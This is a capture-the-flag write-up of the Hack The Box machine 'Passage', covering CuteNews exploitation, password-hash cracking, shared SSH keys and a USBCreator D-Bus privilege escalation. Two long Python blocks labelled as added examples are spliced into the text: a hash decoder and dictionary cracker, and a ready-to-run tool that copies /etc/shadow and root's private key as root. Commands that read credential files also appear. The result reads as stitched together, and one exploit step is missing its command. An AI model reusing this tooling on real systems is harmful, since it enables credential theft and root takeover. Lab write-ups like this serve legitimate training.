Hack The Box — Passage — Write up

Lovelesh Gangil
5 min read · Mar 9, 2021


Passage is a medium difficulty Linux machine that hosts a CuteNews web application. This is found to suffer from a remote command execution vulnerability, which is leveraged to gain a foothold. A CuteNews password hash for the application user paul is discovered and cracked. Owing to password reuse, we can use this to move laterally to the paul system user. A private SSH key is found to be shared between the system users, which allows us to move laterally to nadav. This user is found to be a member of the sudo group. Enumeration of the vim command line history reveals that the com.ubuntu.USBCreator.conf policy has been edited, in order to allow users of the sudo group to invoke methods of the usb-creator service. The D-Bus service USBCreator is found to suffer from a vulnerability, allowing the password security policy imposed by the sudo binary to be bypassed. This is leveraged in order to read privileged files as root.

Scanning and Enumeration

First, we run a full-port Nmap scan with version and default-script detection to find the open ports on the box.

$ nmap -sV -sC -v -p- 10.10.10.206
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3983.09 seconds

The scan shows two open ports: 22 (SSH) and 80 (HTTP). Browsing to port 80 we find a blog titled “Passage News”, and the page identifies the CMS as CuteNews.

Searching for public exploits for CuteNews turns up a Remote Code Execution exploit for CuteNews 2.1.2 (CVE-2019-11447). It registers a user and abuses the avatar upload on the profile page to store a PHP web shell on the server.

Download the Python exploit, run it, and supply the target URL when prompted:

This drops you into a command shell on the target, from which we can launch a proper reverse shell back to our machine.

Spawn a PTY shell by using:

$ python -c 'import pty; pty.spawn("/bin/bash")'

Once on the box, we enumerate the local users:

$ cat /etc/passwd

Searching the web root, we find that CuteNews keeps its user records as files in the /var/www/html/CuteNews/cdata/users directory.

The file 09.php contains a base64-encoded string:

$ cat 09.php

Decoding the base64 reveals a password hash for the user paul: e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd. Running it through hash-identifier points to SHA-256, which is consistent with its 64-hex-character length.

Let’s crack this hash using John The Ripper.

$ echo "e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd" > hash
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
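The decode, identify and crack steps above, carried out in Python as an added example (this is not code from the write-up or from CuteNews). Only paul's hash comes from the page; the record layout (a PHP guard line followed by base64 of a PHP-serialized array), the second user, its password and the toy wordlist are constructed or assumed, and are labelled so in the code:

```python
"""Decode a CuteNews cdata/users/*.php record, identify the hash, try a wordlist.

Added example; not CuteNews code. Assumed layout: a leading "<?php die(...); ?>"
line followed by base64 of a PHP-serialized array. Only PAUL_HASH is real.
"""
import base64
import hashlib
import re

PAUL_HASH = "e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd"  # from the write-up
DEMO_PASSWORD = "winter2020"  # constructed, so the toy wordlist has a guaranteed hit
PHP_GUARD = "<?php die('Direct call - access denied'); ?>"  # assumed guard line

# john's raw-hash format names, keyed by hex digest length (the hash-identifier heuristic).
HASH_BY_LENGTH = {32: ("MD5", "Raw-MD5"), 40: ("SHA-1", "Raw-SHA1"),
                  64: ("SHA-256", "Raw-SHA256"), 128: ("SHA-512", "Raw-SHA512")}
HASHLIB_BY_JOHN = {"Raw-MD5": "md5", "Raw-SHA1": "sha1",
                   "Raw-SHA256": "sha256", "Raw-SHA512": "sha512"}


def php_serialize(obj):
    """Minimal serializer (dict/str only), used to build the constructed sample."""
    if isinstance(obj, str):
        return f's:{len(obj.encode())}:"{obj}";'
    items = "".join(php_serialize(k) + php_serialize(v) for k, v in obj.items())
    return f"a:{len(obj)}:{{{items}}}"


def php_unserialize(data):
    """Parse PHP serialize() output (N, b, i, d, s, a). String lengths are byte
    counts, so callers decode the raw bytes as latin-1 (one char per byte)."""
    pos = 0

    def parse():
        nonlocal pos
        tag = data[pos]
        if tag == "N":                       # N;
            pos += 2
            return None
        if tag in "bid":                     # b:1;  i:42;  d:1.5;
            end = data.index(";", pos)
            raw = data[pos + 2:end]
            pos = end + 1
            return {"b": lambda r: r == "1", "i": int, "d": float}[tag](raw)
        if tag == "s":                       # s:<len>:"<bytes>";
            colon = data.index(":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2
            pos = start + length + 2
            return data[start:start + length]
        if tag == "a":                       # a:<count>:{key value ...}
            colon = data.index(":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2
            out = {}
            for _ in range(count):
                key = parse()
                out[key] = parse()
            pos += 1
            return out
        raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

    return parse()


def load_user_file(text):
    """Drop the PHP guard line, base64-decode the remainder and unserialize it."""
    body = "".join(ln for ln in text.splitlines() if not ln.lstrip().startswith("<?php"))
    return php_unserialize(base64.b64decode(body.strip()).decode("latin-1"))


def find_credentials(obj, found=None):
    """Walk the nested arrays and collect every (name, pass) pair."""
    found = [] if found is None else found
    if isinstance(obj, dict):
        if isinstance(obj.get("name"), str) and isinstance(obj.get("pass"), str):
            found.append((obj["name"], obj["pass"]))
        for value in obj.values():
            find_credentials(value, found)
    return found


def identify_hash(digest):
    """(algorithm, john format) guessed from length; ("unknown", None) otherwise."""
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return ("unknown", None)
    return HASH_BY_LENGTH.get(len(digest), ("unknown", None))


def dictionary_attack(digest, words):
    """Offline equivalent of `john --format=<raw> --wordlist=...` for one hash."""
    algo = HASHLIB_BY_JOHN.get(identify_hash(digest)[1])
    if algo is None:
        return None
    digest = digest.lower()
    for word in words:
        if hashlib.new(algo, word.encode()).hexdigest() == digest:
            return word
    return None


def constructed_user_file():
    """A record shaped like cdata/users/09.php: one constructed user plus paul's real hash."""
    record = {"name": {
        "demo-user": {"name": "demo-user", "pass": hashlib.sha256(DEMO_PASSWORD.encode()).hexdigest(), "acl": "4"},
        "paul": {"name": "paul", "pass": PAUL_HASH, "acl": "2"},
    }}
    return PHP_GUARD + "\n" + base64.b64encode(php_serialize(record).encode("latin-1")).decode() + "\n"


TOY_WORDLIST = ["password", "123456", "summer2019", DEMO_PASSWORD]  # constructed; use rockyou.txt for real

if __name__ == "__main__":
    for name, digest in find_credentials(load_user_file(constructed_user_file())):
        algo, fmt = identify_hash(digest)
        print(f"{name}: {algo} (john --format={fmt}) cracked={dictionary_attack(digest, TOY_WORDLIST)}")
```

Pointing `load_user_file` at every file in cdata/users/ collects all application users at once, and the john format hint saves guessing the `--format` flag.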

John cracks the hash with rockyou. The same password is reused for the system account, so we can log in as paul with it. The user flag is located in /home/paul/user.txt.

In paul's home directory the .ssh folder holds an id_rsa private key and an authorized_keys file whose entry is for the user nadav: the key pair is shared between the two accounts. Using paul's id_rsa we get a shell as nadav:

$ ssh -i id_rsa nadav@10.10.10.206

For privilege escalation we transfer linpeas.sh to the machine and run it. Its output points to a vulnerable version of the USBCreator D-Bus service installed on the system, and nadav is a member of the sudo group, which is exactly what the bug below requires.

According to this article, an attacker with access to a user in the sudo group is able to bypass the password security policy that is imposed by the sudo binary, and overwrite arbitrary files with arbitrary content as root without a password, due to a vulnerability in the USBCreator D-Bus interface: the service's Image method copies a caller-chosen source path to a caller-chosen destination as root. Let's use it to copy the id_rsa file of the root user, with the command described in the same article.
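The gdbus invocation the article describes, wrapped in a small Python helper as an added example (not code from the write-up or the article). It builds the `gdbus call --system` command for com.ubuntu.USBCreator.Image, checks the preconditions first, proves the copy runs as root by reading /etc/shadow, and then saves root's key as a 0600 file we own so `ssh -i` accepts it. The D-Bus policy path, the substring policy check and the assumption that the root-written copy is readable by us are assumptions and are marked in the code:

```python
"""Read root-only files through the USBCreator D-Bus service.

Added example; not code from the article or the write-up. It wraps
gdbus call ... --method com.ubuntu.USBCreator.Image SRC DST allow_unsafe,
which the usb-creator helper executes as root for members of the group the
D-Bus policy grants. Assumed: policy at /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf,
and the helper's umask leaves the copy readable by the caller.
"""
import grp
import os
import shutil
import subprocess
from pathlib import Path

BUS_NAME = "com.ubuntu.USBCreator"
OBJECT_PATH = "/com/ubuntu/USBCreator"
METHOD = "com.ubuntu.USBCreator.Image"
DBUS_POLICY = "/etc/dbus-1/system.d/com.ubuntu.USBCreator.conf"  # assumed path


def usbcreator_image_argv(source, dest, allow_unsafe=True):
    """argv for: gdbus call --system --dest ... --method ...Image SRC DST BOOL."""
    return ["gdbus", "call", "--system", "--dest", BUS_NAME,
            "--object-path", OBJECT_PATH, "--method", METHOD,
            source, dest, "true" if allow_unsafe else "false"]


def policy_allows_group(policy_xml, group="sudo"):
    """Substring check for the <policy group="..."> stanza the vim history showed
    being added. Good enough for triage; it is not an XML parser."""
    return f'group="{group}"' in policy_xml


def preflight(policy_path=DBUS_POLICY, group="sudo"):
    """Reasons the primitive would fail on this host; an empty list means go."""
    problems = []
    if shutil.which("gdbus") is None:
        problems.append("gdbus not on PATH (package libglib2.0-bin)")
    try:
        gid = grp.getgrnam(group).gr_gid
        if gid != os.getgid() and gid not in os.getgroups():
            problems.append(f"current user is not in group {group}")
    except KeyError:
        problems.append(f"group {group} does not exist")
    policy = Path(policy_path)
    if not policy.is_file() or not policy_allows_group(policy.read_text(), group):
        problems.append(f"{policy_path} does not grant group {group}")
    return problems


def copy_as_root(source, dest):
    """Ask USBCreator to write SOURCE to DEST as root and return the bytes read back."""
    subprocess.run(usbcreator_image_argv(source, dest), check=True,
                   stdout=subprocess.DEVNULL, stderr=subprocess.PIPE)
    data = Path(dest).read_bytes()  # assumes the root-written copy is readable by us
    if not data:
        raise RuntimeError(f"{dest} is empty: does {source} exist on the target?")
    return data


def steal_root_key(dest_dir):
    """Confirm the primitive on /etc/shadow (root-only), then pull /root/.ssh/id_rsa
    into a 0600 file we own, which is what ssh -i requires."""
    dest_dir = Path(dest_dir)
    if b"root:" not in copy_as_root("/etc/shadow", str(dest_dir / "shadow.copy")):
        raise RuntimeError("copy did not run as root; check preflight()")
    key = copy_as_root("/root/.ssh/id_rsa", str(dest_dir / "root_rsa.copy"))
    owned = dest_dir / "root_rsa"
    owned.write_bytes(key)
    owned.chmod(0o600)
    return owned


if __name__ == "__main__":
    issues = preflight()
    if issues:
        raise SystemExit("not exploitable here: " + "; ".join(issues))
    print("root key saved to", steal_root_key(os.path.expanduser("~")))
    print("now run: ssh -i ~/root_rsa root@10.10.10.206")
```

The /etc/shadow probe is the cheap sanity check: if the copy comes back with the `root:` line, the helper really ran as root and the same call will work on any root-only path.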

The key exists, and the copy lands in the home directory of our current user nadav. With it we can SSH in as root:

$ ssh -i id_rsa root@10.10.10.206

And voilà, the box is rooted. The root flag is in /root/root.txt.

Visit my Hack The Box profile:

https://app.hackthebox.eu/profile/464208

For any queries, contact me on my Twitter and LinkedIn profiles.


Written by Lovelesh Gangil

Offensive Security | Digital Forensics and Incident Response (DFIR) | CEH (Practical) | ISMS ISO 27001:2022 | CAP | CNSP | GPCSSI '21 | ICSI (CNSS)
